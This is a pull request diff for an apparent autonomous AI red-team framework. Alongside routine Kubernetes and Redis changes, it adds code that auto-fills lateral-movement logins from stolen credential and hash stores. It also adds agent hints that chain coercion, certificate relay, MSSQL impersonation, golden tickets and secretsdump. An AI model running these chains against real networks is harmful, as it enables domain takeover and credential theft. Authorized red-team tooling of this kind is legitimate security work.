### PR TITLE
feat: add Redis Sentinel support, task status tracking, and new MSSQL/AD trust workflows

### DIFF
--- a/.taskfiles/remote/Taskfile.yaml
+++ b/.taskfiles/remote/Taskfile.yaml
@@ -629,8 +629,9 @@ tasks:
       - |
         echo -e "{{.INFO}} Restarting deployments in {{.NAMESPACE}}..."
 
-        # Restart worker agents
+        # Restart worker agents (deployments + statefulsets)
         kubectl rollout restart deployment -n {{.NAMESPACE}} -l ares.dreadnode.io/component=red-team 2>/dev/null || true
+        kubectl rollout restart statefulset -n {{.NAMESPACE}} -l ares.dreadnode.io/component=red-team 2>/dev/null || true
 
         # Restart orchestrator (has different label)
         kubectl rollout restart deployment -n {{.NAMESPACE}} -l app.kubernetes.io/name=ares-orchestrator 2>/dev/null || true
@@ -639,6 +640,7 @@ tasks:
         echo -e "{{.INFO}} Checking worker status..."
 
         kubectl rollout status deployment -n {{.NAMESPACE}} -l ares.dreadnode.io/component=red-team --timeout=60s 2>/dev/null || true
+        kubectl rollout status statefulset -n {{.NAMESPACE}} -l ares.dreadnode.io/component=red-team --timeout=60s 2>/dev/null || true
 
         echo -e "{{.INFO}} Checking orchestrator status..."
         kubectl rollout status deployment -n {{.NAMESPACE}} -l app.kubernetes.io/name=ares-orchestrator --timeout=60s 2>/dev/null || true

--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -948,7 +948,7 @@ tasks:
           exit 1
         fi
 
-        kubectl exec -i -n {{.K8S_NAMESPACE}} "$POD" -c orchestrator -- env REDIS_URL="$REDIS_URL" python - <<'PY'
+        kubectl exec -i -n {{.K8S_NAMESPACE}} "$POD" -- env REDIS_URL="$REDIS_URL" python - <<'PY'
         import asyncio
         import json
         import os
@@ -1018,7 +1018,7 @@ tasks:
           exit 1
         fi
 
-        kubectl exec -i -n {{.K8S_NAMESPACE}} "$POD" -c orchestrator -- env REDIS_URL="$REDIS_URL" python - <<'PY'
+        kubectl exec -i -n {{.K8S_NAMESPACE}} "$POD" -- env REDIS_URL="$REDIS_URL" python - <<'PY'
         import asyncio
         import json
         import os

--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -924,6 +924,153 @@ tasks:
         asyncio.run(main())
         "
 
+  ares:red:multi:tasks:running:
+    desc: "List running tasks for an operation (usage: task ares:red:multi:tasks:running OPERATION_ID=op-xxx [ROLE=lateral])"
+    vars:
+      OPERATION_ID: '{{.OPERATION_ID | default ""}}'
+      ROLE: '{{.ROLE | default ""}}'
+      K8S_NAMESPACE: '{{.K8S_NAMESPACE | default "attack-simulation"}}'
+    preconditions:
+      - sh: test -n "{{.OPERATION_ID}}"
+        msg: "OPERATION_ID variable is required. Usage: task ares:red:multi:tasks:running OPERATION_ID=op-xxx [ROLE=lateral]"
+    cmds:
+      - |
+        REDIS_PASS=$(kubectl get secret redis-secret -n {{.K8S_NAMESPACE}} -o jsonpath='{.data.password}' 2>/dev/null | base64 -d || echo "")
+        if [ -n "$REDIS_PASS" ]; then
+          REDIS_URL="redis://:${REDIS_PASS}@redis:6379"
+        else
+          REDIS_URL="redis://redis:6379"
+        fi
+
+        POD=$(kubectl get pods -n {{.K8S_NAMESPACE}} -l ares.dreadnode.io/role=orchestrator -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)
+        if [ -z "$POD" ]; then
+          echo "❌ No orchestrator pod found in namespace {{.K8S_NAMESPACE}}"
+          exit 1
+        fi
+
+        kubectl exec -i -n {{.K8S_NAMESPACE}} "$POD" -c orchestrator -- env REDIS_URL="$REDIS_URL" python - <<'PY'
+        import asyncio
+        import json
+        import os
+        import redis.asyncio as redis
+
+        OP_ID = "{{.OPERATION_ID}}"
+        ROLE = "{{.ROLE}}"
+
+        async def main():
+            client = redis.from_url(os.environ["REDIS_URL"], decode_responses=True)
+            running = []
+            async for key in client.scan_iter("ares:task_status:*"):
+                raw = await client.get(key)
+                if not raw:
+                    continue
+                try:
+                    data = json.loads(raw)
+                except Exception:
+                    continue
+                if data.get("operation_id") != OP_ID:
+                    continue
+                if ROLE and data.get("role") != ROLE:
+                    continue
+                if data.get("status") != "running":
+                    continue
+                running.append((key, data))
+
+            if not running:
+                print("No running tasks found")
+                return
+
+            for key, data in sorted(running, key=lambda x: x[1].get("started_at", "")):
+                print(key)
+                print(json.dumps({
+                    "started_at": data.get("started_at"),
+                    "pod": data.get("pod_name"),
+                    "role": data.get("role"),
+                    "task_type": data.get("task_type"),
+                    "payload": data.get("payload"),
+                }, indent=2))
+
+        asyncio.run(main())
+        PY
+
+  ares:red:multi:tasks:list:
+    desc: "List tasks for an operation (usage: task ares:red:multi:tasks:list OPERATION_ID=op-xxx [ROLE=lateral] [STATUS=running|completed|failed|all])"
+    vars:
+      OPERATION_ID: '{{.OPERATION_ID | default ""}}'
+      ROLE: '{{.ROLE | default ""}}'
+      STATUS: '{{.STATUS | default "running"}}'
+      K8S_NAMESPACE: '{{.K8S_NAMESPACE | default "attack-simulation"}}'
+    preconditions:
+      - sh: test -n "{{.OPERATION_ID}}"
+        msg: "OPERATION_ID variable is required. Usage: task ares:red:multi:tasks:list OPERATION_ID=op-xxx [ROLE=lateral] [STATUS=running|completed|failed|all]"
+    cmds:
+      - |
+        REDIS_PASS=$(kubectl get secret redis-secret -n {{.K8S_NAMESPACE}} -o jsonpath='{.data.password}' 2>/dev/null | base64 -d || echo "")
+        if [ -n "$REDIS_PASS" ]; then
+          REDIS_URL="redis://:${REDIS_PASS}@redis:6379"
+        else
+          REDIS_URL="redis://redis:6379"
+        fi
+
+        POD=$(kubectl get pods -n {{.K8S_NAMESPACE}} -l ares.dreadnode.io/role=orchestrator -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)
+        if [ -z "$POD" ]; then
+          echo "❌ No orchestrator pod found in namespace {{.K8S_NAMESPACE}}"
+          exit 1
+        fi
+
+        kubectl exec -i -n {{.K8S_NAMESPACE}} "$POD" -c orchestrator -- env REDIS_URL="$REDIS_URL" python - <<'PY'
+        import asyncio
+        import json
+        import os
+        import redis.asyncio as redis
+
+        OP_ID = "{{.OPERATION_ID}}"
+        ROLE = "{{.ROLE}}"
+        STATUS = "{{.STATUS}}"
+
+        async def main():
+            client = redis.from_url(os.environ["REDIS_URL"], decode_responses=True)
+            tasks = []
+            async for key in client.scan_iter("ares:task_status:*"):
+                raw = await client.get(key)
+                if not raw:
+                    continue
+                try:
+                    data = json.loads(raw)
+                except Exception:
+                    continue
+                if data.get("operation_id") != OP_ID:
+                    continue
+                if ROLE and data.get("role") != ROLE:
+                    continue
+                if STATUS != "all" and data.get("status") != STATUS:
+                    continue
+                tasks.append((key, data))
+
+            if not tasks:
+                print("No tasks found")
+                return
+
+            def _ts(item):
+                data = item[1]
+                return data.get("started_at") or data.get("ended_at") or ""
+
+            for key, data in sorted(tasks, key=_ts):
+                print(key)
+                print(json.dumps({
+                    "status": data.get("status"),
+                    "started_at": data.get("started_at"),
+                    "ended_at": data.get("ended_at"),
+                    "pod": data.get("pod_name"),
+                    "role": data.get("role"),
+                    "task_type": data.get("task_type"),
+                    "error": data.get("error"),
+                    "payload": data.get("payload"),
+                }, indent=2))
+
+        asyncio.run(main())
+        PY
+
   ares:red:multi:list:
     desc: "List all multi-agent operations with checkpoints"
     vars:

--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -778,23 +778,23 @@ tasks:
       - cmd: mkdir -p {{.LOG_DIR}}
         silent: true
 
-      # Pin workers to this operation ID to avoid auto-discovery drift
+      # Pin workers to this operation ID without rolling pods
       - cmd: |
-          echo "🔧 Setting OPERATION_ID on worker deployments..."
-          for role in enum cracker acl privesc lateral poisoning; do
-            DEPLOYS=$(kubectl get deploy -n {{.K8S_NAMESPACE}} -l ares.dreadnode.io/role=$role -o name 2>/dev/null)
-            if [ -z "$DEPLOYS" ]; then
-              echo "   ⚠️  No deployments found for role: $role"
-              continue
-            fi
-            kubectl set env -n {{.K8S_NAMESPACE}} $DEPLOYS OPERATION_ID="{{.OPERATION_ID_COMPUTED}}"
-          done
-          echo "⏳ Waiting for worker rollouts..."
-          for role in enum cracker acl privesc lateral poisoning; do
-            for deploy in $(kubectl get deploy -n {{.K8S_NAMESPACE}} -l ares.dreadnode.io/role=$role -o name 2>/dev/null); do
-              kubectl rollout status -n {{.K8S_NAMESPACE}} "$deploy"
-            done
-          done
+          set -euo pipefail
+          echo "🔧 Setting active operation pointer in Redis..."
+          REDIS_POD=$(kubectl get pods -n {{.K8S_NAMESPACE}} -l app=redis -o name 2>/dev/null | head -1)
+          if [ -z "$REDIS_POD" ]; then
+            echo "❌ No Redis pod found in namespace {{.K8S_NAMESPACE}}"
+            exit 1
+          fi
+          REDIS_PASS=$(kubectl get secret redis-secret -n {{.K8S_NAMESPACE}} -o jsonpath='{.data.password}' 2>/dev/null | base64 -d || echo "")
+          REDIS_ENV=()
+          if [ -n "$REDIS_PASS" ]; then
+            REDIS_ENV=(env REDISCLI_AUTH="$REDIS_PASS")
+          fi
+          kubectl exec -n {{.K8S_NAMESPACE}} $REDIS_POD -- "${REDIS_ENV[@]}" \
+            redis-cli set ares:operation:active "{{.OPERATION_ID_COMPUTED}}" >/dev/null
+          echo "✅ Set ares:operation:active -> {{.OPERATION_ID_COMPUTED}}"
         silent: false
 
       # Submit operation
@@ -850,6 +850,28 @@ tasks:
           echo ""
           kubectl logs -f -n {{.K8S_NAMESPACE}} deploy/ares-orchestrator 2>&1 | tee -a "{{.LOGFILE}}"
         silent: false
+
+  ares:red:multi:report:
+    desc: "Fetch a multi-agent red team report from the orchestrator pod (usage: task ares:red:multi:report OPERATION_ID=op-xxx)"
+    vars:
+      OPERATION_ID: '{{.OPERATION_ID | default ""}}'
+      K8S_NAMESPACE: '{{.K8S_NAMESPACE | default "attack-simulation"}}'
+      REMOTE_REPORT_DIR: '{{.REMOTE_REPORT_DIR | default "/reports"}}'
+    preconditions:
+      - sh: test -n "{{.OPERATION_ID}}"
+        msg: "OPERATION_ID variable is required. Usage: task ares:red:multi:report OPERATION_ID=op-xxx"
+    cmds:
+      - |
+        POD=$(kubectl get pods -n {{.K8S_NAMESPACE}} -l app=ares-orchestrator -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)
+        if [ -z "$POD" ]; then
+          echo "❌ No orchestrator pod found in namespace {{.K8S_NAMESPACE}}"
+          exit 1
+        fi
+        REMOTE_PATH="{{.REMOTE_REPORT_DIR}}/{{.OPERATION_ID}}_report.md"
+        mkdir -p {{.REPORT_DIR}}
+        kubectl exec -n {{.K8S_NAMESPACE}} "$POD" -- test -f "$REMOTE_PATH"
+        kubectl cp -n {{.K8S_NAMESPACE}} "$POD:$REMOTE_PATH" "{{.REPORT_DIR}}/"
+        echo "✅ Report copied to: {{.REPORT_DIR}}/{{.OPERATION_ID}}_report.md"
 
   ares:red:multi:status:
     desc: "Check multi-agent operation status (usage: task ares:red:multi:status OPERATION_ID=op-xxx)"
@@ -1323,9 +1345,10 @@ tasks:
       NAMESPACE: '{{.NAMESPACE | default "attack-simulation"}}'
     cmds:
       - |
-        echo "🔄 Restarting red team deployments in namespace: {{.NAMESPACE}}"
+        echo "🔄 Restarting red team workloads in namespace: {{.NAMESPACE}}"
         kubectl rollout restart deployment -n {{.NAMESPACE}} -l ares.dreadnode.io/component=red-team
-        echo "✅ Red team deployments restarted"
+        kubectl rollout restart statefulset -n {{.NAMESPACE}} -l ares.dreadnode.io/component=red-team
+        echo "✅ Red team workloads restarted"
 
   ares:red:logs:
     desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])"

--- a/poetry.lock
+++ b/poetry.lock
@@ -729,6 +729,18 @@ training = ["datasets (>=4.0.0,<5.0.0)", "pyarrow (>=22.0.0,<22.1.0)", "transfor
 transforms = ["art (>=6.5,<7.0.0)"]
 
 [[package]]
+name = "durationpy"
+version = "0.10"
+description = "Module for converting between datetime.timedelta and Go's Duration strings."
+optional = false
+python-versions = "*"
+groups = ["main"]
+files = [
+    {file = "durationpy-0.10-py3-none-any.whl", hash = "sha256:3b41e1b601234296b4fb368338fdcd3e13e0b4fb5b67345948f4f2bf9868b286"},
+    {file = "durationpy-0.10.tar.gz", hash = "sha256:1fa6893409a6e739c9c72334fc65cca1f355dbdd93405d30f726deb5bde42fba"},
+]
+
+[[package]]
 name = "exceptiongroup"
 version = "1.3.1"
 description = "Backport of PEP 654 (exception groups)"
@@ -1428,6 +1440,33 @@ files = [
 
 [package.dependencies]
 referencing = ">=0.31.0"
+
+[[package]]
+name = "kubernetes"
+version = "35.0.0"
+description = "Kubernetes python client"
+optional = false
+python-versions = ">=3.6"
+groups = ["main"]
+files = [
+    {file = "kubernetes-35.0.0-py2.py3-none-any.whl", hash = "sha256:39e2b33b46e5834ef6c3985ebfe2047ab39135d41de51ce7641a7ca5b372a13d"},
+    {file = "kubernetes-35.0.0.tar.gz", hash = "sha256:3d00d344944239821458b9efd484d6df9f011da367ecb155dadf9513f05f09ee"},
+]
+
+[package.dependencies]
+certifi = ">=14.05.14"
+durationpy = ">=0.7"
+python-dateutil = ">=2.5.3"
+pyyaml = ">=5.4.1"
+requests = "*"
+requests-oauthlib = "*"
+six = ">=1.9.0"
+urllib3 = ">=1.24.2,<2.6.0 || >2.6.0"
+websocket-client = ">=0.32.0,<0.40.0 || >0.40.0,<0.41.dev0 || >=0.43.dev0"
+
+[package.extras]
+adal = ["adal (>=1.0.2)"]
+google-auth = ["google-auth (>=1.0.1)"]
 
 [[package]]
 name = "librt"
@@ -2223,6 +2262,23 @@ files = [
     {file = "numpy-2.2.3-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:783145835458e60fa97afac25d511d00a1eca94d4a8f3ace9fe2043003c678e4"},
     {file = "numpy-2.2.3.tar.gz", hash = "sha256:dbdc15f0c81611925f382dfa97b3bd0bc2c1ce19d4fe50482cb0ddc12ba30020"},
 ]
+
+[[package]]
+name = "oauthlib"
+version = "3.3.1"
+description = "A generic, spec-compliant, thorough implementation of the OAuth request-signing logic"
+optional = false
+python-versions = ">=3.8"
+groups = ["main"]
+files = [
+    {file = "oauthlib-3.3.1-py3-none-any.whl", hash = "sha256:88119c938d2b8fb88561af5f6ee0eec8cc8d552b7bb1f712743136eb7523b7a1"},
+    {file = "oauthlib-3.3.1.tar.gz", hash = "sha256:0f0f8aa759826a193cf66c12ea1af1637f87b9b4622d46e866952bb022e538c9"},
+]
+
+[package.extras]
+rsa = ["cryptography (>=3.0.0)"]
+signals = ["blinker (>=1.4.0)"]
+signedtoken = ["cryptography (>=3.0.0)", "pyjwt (>=2.0.0,<3)"]
 
 [[package]]
 name = "openai"
@@ -3361,6 +3417,25 @@ socks = ["PySocks (>=1.5.6,!=1.5.7)"]
 use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"]
 
 [[package]]
+name = "requests-oauthlib"
+version = "2.0.0"
+description = "OAuthlib authentication support for Requests."
+optional = false
+python-versions = ">=3.4"
+groups = ["main"]
+files = [
+    {file = "requests-oauthlib-2.0.0.tar.gz", hash = "sha256:b3dffaebd884d8cd778494369603a9e7b58d29111bf6b41bdc2dcd87203af4e9"},
+    {file = "requests_oauthlib-2.0.0-py2.py3-none-any.whl", hash = "sha256:7dd8a5c40426b779b0868c404bdef9768deccf22749cde15852df527e6269b36"},
+]
+
+[package.dependencies]
+oauthlib = ">=3.0.0"
+requests = ">=2.0.0"
+
+[package.extras]
+rsa = ["oauthlib[signedtoken] (>=3.0.0)"]
+
+[[package]]
 name = "rich"
 version = "14.2.0"
 description = "Render rich text, tables, progress bars, syntax highlighting, markdown and more to the terminal"
@@ -4186,6 +4261,23 @@ files = [
 watchmedo = ["PyYAML (>=3.10)"]
 
 [[package]]
+name = "websocket-client"
+version = "1.9.0"
+description = "WebSocket client for Python with low level API options"
+optional = false
+python-versions = ">=3.9"
+groups = ["main"]
+files = [
+    {file = "websocket_client-1.9.0-py3-none-any.whl", hash = "sha256:af248a825037ef591efbf6ed20cc5faa03d3b47b9e5a2230a529eeee1c1fc3ef"},
+    {file = "websocket_client-1.9.0.tar.gz", hash = "sha256:9e813624b6eb619999a97dc7958469217c3176312b3a16a4bd1bc7e08a46ec98"},
+]
+
+[package.extras]
+docs = ["Sphinx (>=6.0)", "myst-parser (>=2.0.0)", "sphinx_rtd_theme (>=1.1.0)"]
+optional = ["python-socks", "wsaccel"]
+test = ["pytest", "websockets"]
+
+[[package]]
 name = "win32-setctime"
 version = "1.2.0"
 description = "A small Python utility to set file creation time on Windows"
@@ -4427,4 +4519,4 @@ docs = ["mkdocs", "mkdocs-material", "mkdocs-section-index", "mkdocstrings", "mk
 [metadata]
 lock-version = "2.1"
 python-versions = ">=3.10,<3.14"
-content-hash = "4fa8dac6821a8b0d71db0b74b4e641f72490869f3a47f8c716f1a34b22d44e38"
+content-hash = "548846fac6d31fae94e3d99d968a50f6d7e25747c6c9b2533441117065227018"

--- a/src/ares/core/dispatcher.py
+++ b/src/ares/core/dispatcher.py
@@ -638,12 +638,58 @@ class RedTeamDispatcher:
         Returns:
             Task ID for tracking.
         """
+        resolved_password = password
+        resolved_hash = hash_value
+        resolved_domain = domain
+
+        if not resolved_password and not resolved_hash:
+            username_key = username.strip().lower()
+            domain_key = domain.strip().lower() if domain else ""
+
+            matching_creds = [
+                cred
+                for cred in self.shared_state.all_credentials
+                if cred.username.strip().lower() == username_key
+                and (not domain_key or cred.domain.strip().lower() == domain_key)
+            ]
+
+            if matching_creds:
+                cred = matching_creds[0]
+                resolved_password = cred.password
+                if not resolved_domain:
+                    resolved_domain = cred.domain
+                logger.debug(
+                    "Filled lateral auth from credential store for %s\\%s",
+                    resolved_domain or domain,
+                    username,
+                )
+
+            if not resolved_password:
+                matching_hashes = [
+                    h
+                    for h in self.shared_state.all_hashes
+                    if h.username.strip().lower() == username_key
+                    and (not domain_key or h.domain.strip().lower() == domain_key)
+                ]
+                if matching_hashes:
+                    h = matching_hashes[0]
+                    resolved_hash = h.hash_value
+                    if h.cracked_password:
+                        resolved_password = h.cracked_password
+                    if not resolved_domain:
+                        resolved_domain = h.domain
+                    logger.debug(
+                        "Filled lateral auth from hash store for %s\\%s",
+                        resolved_domain or domain,
+                        username,
+                    )
+
         payload = {
             "target_host": target_host,
             "username": username,
-            "password": password,
-            "hash_value": hash_value,
-            "domain": domain,
+            "password": resolved_password,
+            "hash_value": resolved_hash,
+            "domain": resolved_domain,
             "method": method,
         }
 

--- a/src/ares/core/dispatcher.py
+++ b/src/ares/core/dispatcher.py
@@ -47,6 +47,7 @@ from ares.core.models import (
     TaskStatus,
     VulnerabilityInfo,
 )
+from ares.core.redis_client import create_redis_client
 from ares.core.task_queue import RedisTaskQueue
 from ares.core.task_queue import TaskResult as QueueTaskResult
 
@@ -145,13 +146,9 @@ class RedTeamDispatcher:
         # Connect to Redis if URL provided
         if self._redis_url:
             try:
-                import redis.asyncio as redis
-
-                self._redis_client = redis.from_url(self._redis_url)
+                self._redis_client = await create_redis_client(self._redis_url)
                 await self._redis_client.ping()
                 logger.info(f"Connected to Redis at {self._redis_url}")
-            except ImportError:
-                logger.warning("redis package not installed, using in-memory state")
             except Exception as e:
                 logger.warning(f"Failed to connect to Redis: {e}, using in-memory state")
 

--- a/src/ares/core/dispatcher.py
+++ b/src/ares/core/dispatcher.py
@@ -693,6 +693,15 @@ class RedTeamDispatcher:
             "method": method,
         }
 
+        if not resolved_password and not resolved_hash:
+            logger.warning(
+                "Skipping lateral movement for %s\\%s -> %s: missing credentials",
+                resolved_domain or domain,
+                username,
+                target_host,
+            )
+            return ""
+
         # Use Redis task queue if available (Kubernetes multi-pod mode)
         if self._task_queue:
             task_id = await self._task_queue.submit_task(
@@ -1068,6 +1077,15 @@ class RedTeamDispatcher:
                     cracked_password=hash_data.get("cracked_password", ""),
                 )
                 await self.publish_hash(hash_obj, source_agent)
+                if hash_obj.cracked_password:
+                    cracked_cred = Credential(
+                        username=hash_obj.username,
+                        password=hash_obj.cracked_password,
+                        domain=hash_obj.domain,
+                        source=f"hash:{task_id}",
+                        is_admin=False,
+                    )
+                    await self.publish_credential(cracked_cred, source_agent)
             hashes_data = result.get("hashes")
             if isinstance(hashes_data, list):
                 for h in hashes_data:
@@ -1081,6 +1099,15 @@ class RedTeamDispatcher:
                         cracked_password=h.get("cracked_password", ""),
                     )
                     await self.publish_hash(hash_obj, source_agent)
+                    if hash_obj.cracked_password:
+                        cracked_cred = Credential(
+                            username=hash_obj.username,
+                            password=hash_obj.cracked_password,
+                            domain=hash_obj.domain,
+                            source=f"hash:{task_id}",
+                            is_admin=False,
+                        )
+                        await self.publish_credential(cracked_cred, source_agent)
 
         # Broadcast completion
         if success:

--- a/src/ares/core/factories/red_factory.py
+++ b/src/ares/core/factories/red_factory.py
@@ -237,7 +237,7 @@ async def vulnerability_discovery_hook(event: ToolEnd):  # noqa: PLR0912
         redirects.append(
             "🚨 ESC8 ADCS VULNERABILITY FOUND (Web Enrollment)!\n"
             "→ Use certipy_relay_esc8 to set up relay listener\n"
-            "→ Then use petitpotam to coerce DC authentication\n"
+            "→ Then use petitpotam or coercer to coerce DC authentication\n"
             "→ Relay will capture DC certificate\n"
             "→ Use certipy_auth with the captured certificate!"
         )
@@ -299,6 +299,12 @@ async def vulnerability_discovery_hook(event: ToolEnd):  # noqa: PLR0912
             "→ Use mssql_xp_cmdshell with impersonate='sa' to get command execution\n"
             "→ Execute credential harvesting commands"
         )
+    if "is_trustworthy_on" in result.lower() and is_mssql_context:
+        redirects.append(
+            "💾 MSSQL TRUSTWORTHY DATABASE DETECTED!\n"
+            "→ Use mssql_execute_as_user (impersonate_user='dbo')\n"
+            "→ Check for DB-level impersonation and escalate to sysadmin"
+        )
 
     # MSSQL Linked Servers - require explicit linked server indicators
     has_linked_server = (
@@ -329,6 +335,14 @@ async def vulnerability_discovery_hook(event: ToolEnd):  # noqa: PLR0912
             "→ These are local Administrator passwords for specific computers\n"
             "→ Use with evil_winrm or psexec against the target computer\n"
             "→ Then run secretsdump on that target!"
+        )
+
+    # krbtgt hash
+    if "krbtgt" in result.lower() and (":::" in result or "hash" in result.lower()):
+        redirects.append(
+            "🎫 KRBTGT HASH FOUND!\n"
+            "→ If this is a CHILD domain, use raise_child for parent escalation\n"
+            "→ Otherwise use generate_golden_ticket then secretsdump all DCs"
         )
 
     # Password in description - only if non-empty descriptions returned
@@ -424,6 +438,89 @@ def _track_exploitation(tool_name: str) -> None:
             logger.info(f"[+] Exploitation attempted: {vuln_type}")
 
 
+def _track_vulnerability_findings(result: str, tool_name: str, step: int) -> None:
+    result_lower = result.lower()
+    is_mssql = "mssql" in tool_name.lower() or "sql" in result_lower
+    has_acl = any(
+        acl in result_lower
+        for acl in ["genericall", "genericwrite", "writedacl", "forcechangepassword"]
+    )
+    is_acl_tool = tool_name in {"run_bloodhound", "enumerate_users"}
+    has_linked_server = (
+        "linked server" in result_lower
+        or "srv_name" in result_lower
+        or "is_linked" in result_lower
+        or "sp_linkedservers" in result_lower
+    )
+    has_laps_data = (
+        "ms-mcs-admpwd" in result_lower
+        and "no laps" not in result_lower
+        and "not found" not in result_lower
+    )
+
+    checks = [
+        (
+            "ESC1" in result and ("exploitable" in result_lower or "vulnerable" in result_lower),
+            ("esc1_adcs", "ADCS ESC1", "certipy_req_esc1 → certipy_auth"),
+        ),
+        (
+            "ESC4" in result and ("exploitable" in result_lower or "vulnerable" in result_lower),
+            (
+                "esc4_adcs",
+                "ADCS ESC4 (Template Modification)",
+                "certipy_template_esc4 → certipy_req_esc1",
+            ),
+        ),
+        (
+            "ESC8" in result and ("exploitable" in result_lower or "vulnerable" in result_lower),
+            ("esc8_adcs", "ADCS ESC8 (Web Enrollment)", "certipy_relay_esc8 + petitpotam"),
+        ),
+        (
+            has_acl and is_acl_tool,
+            (
+                "acl_abuse",
+                "ACL Abuse Path",
+                "certipy_shadow_auto / targeted_kerberoast / force_change_password / dacl_edit",
+            ),
+        ),
+        (
+            "unconstrained" in result_lower and "delegation" in result_lower,
+            ("unconstrained_delegation", "Unconstrained Delegation", "petitpotam / coercer"),
+        ),
+        (
+            "constrained" in result_lower
+            and "delegation" in result_lower
+            and "unconstrained" not in result_lower,
+            ("constrained_delegation", "Constrained Delegation", "constrained_delegation_s4u"),
+        ),
+        (
+            "impersonate" in result_lower and is_mssql,
+            ("mssql_impersonation", "MSSQL Impersonation", "mssql_xp_cmdshell with impersonate"),
+        ),
+        (
+            "is_trustworthy_on" in result_lower and is_mssql,
+            (
+                "mssql_trustworthy",
+                "MSSQL Trustworthy Database",
+                "mssql_execute_as_user with impersonate_user='dbo'",
+            ),
+        ),
+        (
+            has_linked_server and is_mssql,
+            ("mssql_linked", "MSSQL Linked Servers", "mssql_exec_linked"),
+        ),
+        (has_laps_data, ("laps", "LAPS Passwords", "Use with evil_winrm / psexec")),
+        (
+            "krbtgt" in result_lower and (":::" in result or "hash" in result_lower),
+            ("krbtgt_hash", "Krbtgt Hash", "golden_ticket → secretsdump"),
+        ),
+    ]
+
+    for condition, (vuln_id, vuln_type, tool) in checks:
+        if condition:
+            _track_discovery(vuln_id, vuln_type, tool, step)
+
+
 async def track_vulnerability_discoveries(event: ToolEnd):
     """
     Track discovered vulnerabilities and exploitation attempts.
@@ -441,89 +538,7 @@ async def track_vulnerability_discoveries(event: ToolEnd):
     result = str(event.message.content)
     tool_name = event.tool_call.name if hasattr(event, "tool_call") and event.tool_call else ""
     step = _last_step_number or 0
-    result_lower = result.lower()
-
-    # Track ESC1 ADCS vulnerability
-    is_esc1 = "ESC1" in result and ("exploitable" in result_lower or "vulnerable" in result_lower)
-    if is_esc1:
-        _track_discovery("esc1_adcs", "ADCS ESC1", "certipy_req_esc1 → certipy_auth", step)
-
-    # Track ESC4 ADCS vulnerability
-    is_esc4 = "ESC4" in result and ("exploitable" in result_lower or "vulnerable" in result_lower)
-    if is_esc4:
-        _track_discovery(
-            "esc4_adcs",
-            "ADCS ESC4 (Template Modification)",
-            "certipy_template_esc4 → certipy_req_esc1",
-            step,
-        )
-
-    # Track ESC8 ADCS vulnerability - require explicit ESC8 marker
-    is_esc8 = "ESC8" in result and ("exploitable" in result_lower or "vulnerable" in result_lower)
-    if is_esc8:
-        _track_discovery(
-            "esc8_adcs", "ADCS ESC8 (Web Enrollment)", "certipy_relay_esc8 + petitpotam", step
-        )
-
-    # Track ACL abuse paths
-    has_acl = any(
-        acl in result_lower
-        for acl in ["genericall", "genericwrite", "writedacl", "forcechangepassword"]
-    )
-    is_acl_tool = tool_name in ["run_bloodhound", "enumerate_users"]
-    if has_acl and is_acl_tool:
-        _track_discovery(
-            "acl_abuse",
-            "ACL Abuse Path",
-            "certipy_shadow_auto / targeted_kerberoast / force_change_password / dacl_edit",
-            step,
-        )
-
-    # Track unconstrained delegation
-    if "unconstrained" in result_lower and "delegation" in result_lower:
-        _track_discovery(
-            "unconstrained_delegation", "Unconstrained Delegation", "petitpotam / coercer", step
-        )
-
-    # Track constrained delegation
-    if (
-        "constrained" in result_lower
-        and "delegation" in result_lower
-        and "unconstrained" not in result_lower
-    ):
-        _track_discovery(
-            "constrained_delegation", "Constrained Delegation", "constrained_delegation_s4u", step
-        )
-
-    # Track MSSQL impersonation
-    is_mssql = "mssql" in tool_name.lower() or "sql" in result_lower
-    if "impersonate" in result_lower and is_mssql:
-        _track_discovery(
-            "mssql_impersonation", "MSSQL Impersonation", "mssql_xp_cmdshell with impersonate", step
-        )
-
-    # Track MSSQL linked servers - require explicit indicators
-    has_linked_server = (
-        "linked server" in result_lower
-        or "srv_name" in result_lower
-        or "is_linked" in result_lower
-        or "sp_linkedservers" in result_lower
-    )
-    if has_linked_server and is_mssql:
-        _track_discovery("mssql_linked", "MSSQL Linked Servers", "mssql_exec_linked", step)
-
-    # Track LAPS - only when actual attribute found, not just the word "laps"
-    has_laps_data = (
-        "ms-mcs-admpwd" in result_lower
-        and "no laps" not in result_lower
-        and "not found" not in result_lower
-    )
-    if has_laps_data:
-        _track_discovery("laps", "LAPS Passwords", "Use with evil_winrm / psexec", step)
-
-    # Track krbtgt hash
-    if "krbtgt" in result_lower and (":::" in result or "hash" in result_lower):
-        _track_discovery("krbtgt_hash", "Krbtgt Hash", "golden_ticket → secretsdump", step)
+    _track_vulnerability_findings(result, tool_name, step)
 
     # Track exploitation attempts
     _track_exploitation(tool_name)

--- a/src/ares/core/recovery.py
+++ b/src/ares/core/recovery.py
@@ -13,6 +13,7 @@ from typing import TYPE_CHECKING
 from loguru import logger
 
 from ares.core.models import DEFAULT_MAX_RETRIES, SharedRedTeamState, TaskStatus
+from ares.core.redis_client import create_redis_client
 from ares.core.task_queue import RedisTaskQueue
 
 if TYPE_CHECKING:
@@ -69,13 +70,9 @@ class OperationRecoveryManager:
         """Initialize Redis connection."""
         if self._redis_url:
             try:
-                import redis.asyncio as redis
-
-                self._redis_client = redis.from_url(self._redis_url)
+                self._redis_client = await create_redis_client(self._redis_url)
                 await self._redis_client.ping()
                 logger.info(f"Recovery manager connected to Redis: {self._redis_url}")
-            except ImportError:
-                logger.warning("redis package not installed, recovery disabled")
             except Exception as e:
                 logger.warning(f"Failed to connect to Redis: {e}")
 
@@ -233,7 +230,12 @@ class OperationRecoveryManager:
             time_key = f"ares:operation:{operation_id}:checkpoint_time"
             checkpoint_time = await self._redis_client.get(time_key)
             if checkpoint_time:
-                logger.info(f"Recovered state from checkpoint at {checkpoint_time.decode()}")
+                checkpoint_str = (
+                    checkpoint_time.decode()
+                    if isinstance(checkpoint_time, (bytes, bytearray))
+                    else str(checkpoint_time)
+                )
+                logger.info(f"Recovered state from checkpoint at {checkpoint_str}")
 
             return state
 

--- a/src/ares/core/redis_client.py
+++ b/src/ares/core/redis_client.py
@@ -1,0 +1,106 @@
